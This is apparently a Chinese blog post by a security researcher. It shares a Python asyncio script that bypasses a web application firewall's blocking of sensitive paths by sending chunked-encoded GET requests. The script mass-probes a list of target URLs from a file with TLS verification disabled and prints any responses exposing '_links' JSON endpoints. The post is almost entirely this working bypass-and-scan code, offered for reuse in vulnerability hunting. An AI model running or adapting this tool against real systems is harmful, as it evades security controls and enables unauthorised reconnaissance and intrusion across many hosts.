关于某waf的路径拦截分块绕过脚本

前言:关于某waf的路径拦截绕过

之前挖掘漏洞的时候,遇到一种情况的就是对于指定敏感路径的拦截,但是这里是可以通过trunk分块传输绕过的,而当时存在资产中存在大量的情况,于是写了一个并发的脚本来进行挖掘探测,有时候需要用到但是总是找不到,就想着直接在博客上面进行保存了

# coding=utf-8
# @Author   : zpchcbd HG team
# @Blog     : https://www.cnblogs.com/zpchcbd/
# @Time     : 2022-04-29 22:17

import asyncio
import aiohttp
import async_timeout

# gheaders = {'Transfer-encoding': 'chunked'}
gFilename = './url.txt'
gPyload = 'your_path'


def urlFormat(url):
    # iFlag = lambda x: x.endswith('/')
    if url.endswith('/'):
        # print('{}{}'.format(url, gPyload))
        return '{}{}'.format(url, gPyload)
    else:
        # print('{}/{}'.format(url, gPyload))
        return '{}/{}'.format(url, gPyload)


async def A(session, url):
    try:
        async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False, data='0',
                               allow_redirects=True) as response:
            text = await response.text()
            await asyncio.sleep(0.1)
            if '{"_links":{"self":{"href"' in text:
                print('-' * 30)
                print('[+] your_path, {}'.format(url))
                print('')
                print(text)
    except Exception as e:
        pass
        # print('[-] curl {} error, the error is {}'.format(url, str(e)))


async def T(url):
    try:
        # async with async_timeout.timeout(2):
        async with aiohttp.ClientSession() as session:
            async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False, data='0', allow_redirects=True) as response:
                retJson = await response.json()
                await asyncio.sleep(0.1)
                if '_links' in retJson.keys():
                    print('[+] your_path, {}'.format(url))
                    print('')
                    print(retJson)
                    print('-' * 30)
    except Exception as e:
        pass
        # print('[-] curl {} error, the error is {}'.format(url, str(e)))


async def C(url):
    async with aiohttp.ClientSession() as session:
        async with session.get(url=urlFormat(url), chunked=True, verify_ssl=False, data='0', allow_redirects=True) as response:
            text = await response.text()
            await asyncio.sleep(2)
            print(text)
            print('-'*30)


async def B():
    taskList = []
    urlList = list(set([x.replace('\n', '') if x.startswith('http') else 'https://' + x.replace('\n', '')
                        for x in open(gFilename, 'r', encoding='UTF-8').readlines()]))
    async with aiohttp.ClientSession() as session: # timeout=len(urlList) * 2
        for _ in urlList:
            taskList.append(A(session, _))
        await asyncio.gather(*taskList)


async def H():
    taskList = []
    urlList = list(set([x.replace('\n', '') if x.startswith('http') else 'https://' + x.replace('\n', '') for x in open(gFilename, 'r', encoding='UTF-8').readlines()]))
    for _ in urlList:
        taskList.append(T(_))
    await asyncio.gather(*taskList)


if __name__ == '__main__':
    loop = asyncio.get_event_loop()
    loop.run_until_complete(H())

posted @ 2022-10-17 15:36  zpchcbd  阅读(135)  评论(0)    收藏  举报